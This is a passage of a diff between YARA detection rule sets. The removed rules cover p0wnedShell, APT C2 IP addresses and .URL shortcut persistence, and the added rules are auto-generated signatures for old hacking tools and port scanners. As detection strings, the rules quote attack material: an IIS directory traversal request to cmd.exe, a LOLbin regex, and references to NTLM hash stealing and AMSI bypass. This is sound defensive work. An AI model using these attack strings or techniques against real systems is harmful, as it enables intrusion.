 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedamsibypass
+rule SIGNATURE_BASE_Scanarator
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "168af265-d3e9-59a2-b754-20d6c9a298b1"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L163-L178"
+		description = "Auto-generated rule on file scanarator.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "dfc3ff29-03b4-58ca-bfe0-c6888fddab67"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L302-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f7613506058706fc74979fdd4f9e425e9d16527120e0f2f49bc21e3e43d3b16"
+		hash = "848bd5a518e0b6c05bd29aceb8536c46"
+		logic_hash = "9400435470c26245cd814e1e39f275eb22566d66d1a72d4f3e618a6ad11bc8d9"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "345e8e6f38b2914f4533c4c16421d372d61564a4275537e674a2ac3360b19284"
 
 	strings:
-		$x1 = "Program.P0wnedPath()" fullword ascii
-		$x2 = "namespace p0wnedShell" fullword ascii
-		$x3 = "H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe" ascii
+		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedshell_Outputs
+rule SIGNATURE_BASE_Aolipsniffer
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c19fc14b-0c42-5dd1-bff2-ba75f4168d9c"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L180-L196"
+		description = "Auto-generated rule on file aolipsniffer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "f7cc0f31-6ba4-504b-82de-0334257b8a95"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L314-L332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85d5317a473d981fe6ee1362789f34653a838c63d823bb62028a25c9db27cf6e"
+		hash = "51565754ea43d2d57b712d9f0a3e62b8"
+		logic_hash = "e627b8ea85e4325714c98e93ad6147adfa600af548a80dce8548b7f5743733b5"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
 
 	strings:
-		$s1 = "[+] For this attack to succeed, you need to have Admin privileges." fullword ascii
-		$s2 = "[+] This is not a valid hostname, please try again" fullword ascii
-		$s3 = "[+] First return the name of our current domain." fullword ascii
+		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+		$s1 = "dwGetAddressForObject"
+		$s2 = "Color Transfer Settings"
+		$s3 = "FX Global Lighting Angle"
+		$s4 = "Version compatibility info"
+		$s5 = "New Windows Thumbnail"
+		$s6 = "Layer ID Generator Base"
+		$s7 = "Color Halftone Settings"
+		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_COZY_FANCY_BEAR_Hunt : FILE
+rule SIGNATURE_BASE__Bitchin_Threads_
 {
 	meta:
-		description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e81b4368-7383-5a48-a89a-f91b9306326e"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_dnc.yar#L10-L28"
+		description = "Auto-generated rule on file =Bitchin Threads=.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "3a51e76c-b360-5f10-961c-ecc3ea3fa3c9"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L334-L345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9009f181eeecce0ae322ba24335426399cf4484dfc9b7ea6905fb163b4bf0a25"
+		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+		logic_hash = "f43fec37d9dc668b562838465e5696e502c638b207e7af6a77fac5a8b00e92a8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "185.100.84.134" ascii wide fullword
-		$s2 = "58.49.58.58" ascii wide fullword
-		$s3 = "218.1.98.203" ascii wide fullword
-		$s4 = "187.33.33.8" ascii wide fullword
-		$s5 = "185.86.148.227" ascii wide fullword
-		$s6 = "45.32.129.185" ascii wide fullword
-		$s7 = "23.227.196.217" ascii wide fullword
+		$s0 = "DarKPaiN"
+		$s1 = "=BITCHIN THREADS"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_COZY_FANCY_BEAR_Pagemgr_Hunt : FILE
+rule SIGNATURE_BASE_Cgis4_Cgis4
 {
 	meta:
-		description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c5c8843-81ba-510c-82ed-4b6e2286bdb2"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_dnc.yar#L30-L42"
+		description = "Auto-generated rule on file cgis4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "98fbf445-b7a5-58fa-8f06-34be7321e2eb"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L347-L362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c6055b7cd04b994c80395276e83bec664b7dd32f8093411bfde0850cca39e9f7"
+		hash = "d658dad1cd759d7f7d67da010e47ca23"
+		logic_hash = "2cf3fc6447323cbefe5f5ad02271eeb4c271bb9784d2c29030858542a43fbb04"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "pagemgr.exe" wide fullword
+		$s0 = ")PuMB_syJ"
+		$s1 = "&,fARW>yR"
+		$s2 = "m3hm3t_rullaz"
+		$s3 = "7Projectc1"
+		$s4 = "Ten-GGl\""
+		$s5 = "/Moziqlxa"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Local_URL : FILE
+rule SIGNATURE_BASE_Portscan
 {
 	meta:
-		description = "Detects local script usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
-		id = "438d9323-cb6a-5f5d-af71-76692b93436a"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L2-L19"
+		description = "Auto-generated rule on file portscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "967d6e3b-ae0d-5f93-a20d-742fc010608d"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L364-L375"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e95e5e97760d9b565184c588fdafe8408cdab61959aee5221485df53ef5f51d6"
-		score = 50
+		hash = "a8bfdb2a925e89a281956b1e3bb32348"
+		logic_hash = "d93b54ffc7416b5354304daf156908f11d7e320a91bd936e397a15ede63caae3"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$file = "URL=file:///" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s5 = "0    :SCAN BEGUN ON PORT:"
+		$s6 = "0    :PORTSCAN READY."
 
 	condition:
-		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_SMB_URL : FILE
+rule SIGNATURE_BASE_Proport_Zip_Folder_Proport
 {
 	meta:
-		description = "Detects remote SMB path for .URL persistence"
-		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
-		id = "e23609a1-9b18-5a56-92ee-c7f84c966865"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L21-L39"
+		description = "Auto-generated rule on file ProPort.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "cd611f6c-42ed-5cd3-a6ab-7e0970925e61"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L377-L394"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e0bef7497fcb284edb0c65b59d511830"
-		logic_hash = "4903c8f4bb08e799f6787ad29cf7688f354f97a065bcd24c58d3ccd3778a6a15"
-		score = 50
-		quality = 60
-		tags = "FILE"
+		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+		logic_hash = "0ee2ffc5ed243d170b8013b3a164a3719f43bd473f4af7e1a2697d88a298fe9f"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$file = /URL=file:\/\/[a-z0-9]/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "Corrupt Data!"
+		$s1 = "K4p~omkIz"
+		$s2 = "DllTrojanScan"
+		$s3 = "GetDllInfo"
+		$s4 = "Compressed by Petite (c)1999 Ian Luck."
+		$s5 = "GetFileCRC32"
+		$s6 = "GetTrojanNumber"
+		$s7 = "TFAKAbout"
 
 	condition:
-		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconremote_Smborlocal : FILE
+rule SIGNATURE_BASE_Stealthwasp_S_Basic_Portscanner_V1_2
 {
 	meta:
-		description = "This is the syntax used for NTLM hash stealing via Responder - https://www.securify.nl/nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html"
-		author = "@itsreallynick (Nick Carr)"
-		id = "9362ce46-265c-5215-bee1-3d784d0cb928"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1176241449148588032"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L61-L78"
+		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "7f706186-f2e2-5d4d-951a-2ec8fc757cec"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L396-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c49908c7f52ebcd512ff2dc8c40392767769130b9d39abb9d5fc9e130edb65c"
-		score = 50
+		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+		logic_hash = "b01c165b5e5be3ba6905e8bc44a14c3d7195effd058e4c0c31678777d19db8b5"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$icon = "IconFile=file://" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s1 = "Basic PortScanner"
+		$s6 = "Now scanning port:"
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Shortcut_Hotkey : FILE
+rule SIGNATURE_BASE_Bluesportscan
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "0ce377c4-db9b-59fa-987b-a77eaf408765"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L80-L97"
+		description = "Auto-generated rule on file BluesPortScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "4bcb8b7c-5e22-5496-9a29-66e85e3c3395"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L409-L420"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a48f7c1125218ee89f58f1517e81150038a5d71889d847e7690b13c818b32fb5"
-		score = 50
+		hash = "6292f5fc737511f91af5e35643fc9eef"
+		logic_hash = "5cb4e4b87eaf166c85d23114f5abc10ef83b4a29968bf6fef4b3fce7ff2787fd"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$hotkey = /[\x0a\x0d]HotKey=[1-9]/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "This program was made by Volker Voss"
+		$s1 = "JiBOo~SSB"
 
 	condition:
-		$hotkey and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Baseurlsyntax : FILE
+rule SIGNATURE_BASE_Scanarator_Iis
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "cab7b573-d197-5afc-95a9-ef05a07c2b7a"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L99-L117"
+		description = "Auto-generated rule on file iis.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "a467147b-53c8-53db-aa33-5f0e4e066988"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L422-L433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4aa29bedb5689fe16c067f5ea933e56804085712c7469b138d8b658a30a7eb67"
-		score = 50
+		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+		logic_hash = "092cb902e10624b207b7932e6b3c1fe2277ed1d183e5de9ee4d07d8548e90ab6"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$baseurl1 = "BASEURL=file://" nocase
-		$baseurl2 = "[DEFAULT]" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "example: iis 10.10.10.10"
+		$s1 = "send error"
 
 	condition:
-		all of ( $baseurl* ) and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconnotfromexeordllorico : FILE
+rule SIGNATURE_BASE_Stealth_Stealth
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "82d0483f-48ee-5d0c-ba7d-73d9e9455423"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1176229087196696577"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L161-L179"
+		description = "Auto-generated rule on file Stealth.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5f45882e-3e27-596d-8725-fad380e1c297"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L435-L446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "957fe9f24d08033cf6e29d7e202e04bfb579577d3850a99e97da6b70924ae88e"
-		score = 50
+		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+		logic_hash = "e210b1a553549c22f66511dfc9d0d3f5b17f02981b9e9915827bc909f34b3262"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$icon = "IconFile="
-		$icon_negate = /[\x0a\x0d]IconFile=[^\x0d]*\.(dll|exe|ico)\x0d/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+		$s6 = "This tool may be used only by system administrators. I am not responsible for "
 
 	condition:
-		any of ( $url* ) and $icon and not $icon_negate and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Evasion : FILE
+rule SIGNATURE_BASE_Angry_IP_Scanner_V2_08_Ipscan
 {
 	meta:
-		description = "Non-standard .URLs and evasion"
-		author = "@itsreallynick (Nick Carr)"
-		id = "36df4252-2575-5efa-88ce-17e68a349306"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DissectMalware/status/1176736510856634368"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L181-L198"
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5fbcbb95-6cd4-5587-bf44-5b5ed133ce5e"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L448-L460"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4fafae6af3ed5cc2e83e30427107d1c42cc4bc86d5c6a60e26953a11847029f"
-		score = 50
+		hash = "70cf2c09776a29c3e837cb79d291514a"
+		logic_hash = "1b50856ad35c146a684298a86f1629c45996ab08ffae8486a388805262ec2367"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$URI = /[\x0a\x0d](IconFile|(Base|)URL)[^\x0d=]+/ nocase
-		$filetype_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$filetype_explicit = "[InternetShortcut]" nocase
+		$s0 = "_H/EnumDisplay/"
+		$s5 = "ECTED.MSVCRT0x"
+		$s8 = "NotSupported7"
 
 	condition:
-		any of ( $filetype* ) and $URI and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Lolcommand : FILE
+rule SIGNATURE_BASE_Crack_Loader
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "061e7919-17f1-5774-ad7d-fc964dc9a947"
-		date = "2019-09-27"
-		modified = "2021-02-14"
-		reference = "https://twitter.com/ItsReallyNick/status/1176601500069576704"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L201-L219"
+		description = "Auto-generated rule on file Loader.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "0c4c7b69-7739-5c1b-8c7c-4aaa724e4455"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L462-L473"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4ac9a555e61303a173443de2a189536c8ea0fc32ee73c589dd104275c7967c57"
-		score = 50
+		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+		logic_hash = "3380ace7c34c15dfd9a9625c8c4a1ed7e35c1cf3c2eca9b1e00dd0092d256150"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*(powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(\.exe|)[^\x0d]{2,50}\x0d/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "NeoWait.exe"
+		$s1 = "RRRRRRRW"
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Webdav : FILE
+rule SIGNATURE_BASE_CN_GUI_Scanner
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "cd660b84-d7c6-52fc-9e1d-76450e5262b1"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176243536754282497"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L222-L239"
+		description = "Detects an unknown GUI scanner tool - CN background"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ca88d4d3-5d18-5856-874f-e50deceef54f"
+		date = "2014-04-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L475-L492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fec084392140245eeb25bb512f3a4631ec6be08c197ec130a907fc118161197"
-		score = 50
+		hash = "3c67bbb1911cdaef5e675c56145e1112"
+		logic_hash = "f9281277ad7058527699d1f5037bb78be1363c90f38e2e399592c58f0b313bd7"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=\s*\/\/[A-Za-z0-9]/
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s1 = "good.txt" fullword ascii
+		$s2 = "IP.txt" fullword ascii
+		$s3 = "xiaoyuer" fullword ascii
+		$s0w = "ssh(" wide
+		$s1w = ").exe" fullword wide
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Scripturl : FILE
+rule SIGNATURE_BASE_CN_Packed_Scanner : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "2f55f8a9-4e4b-5480-9042-da6bb66b2e06"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L241-L259"
+		description = "Suspiciously packed executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a11c4ee6-7244-5601-af26-a45f9fdc8e1b"
+		date = "2014-06-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L494-L510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ece0013dbc9836fa800f99a10ab46c1eb081e1c04fe45fe17be26ffac1d464e9"
-		score = 50
-		quality = 85
+		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+		logic_hash = "0d9178ec65029e4ce8d4c3cc28ebd041c612f3a48f095b60c7a4515de03cccf4"
+		score = 40
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
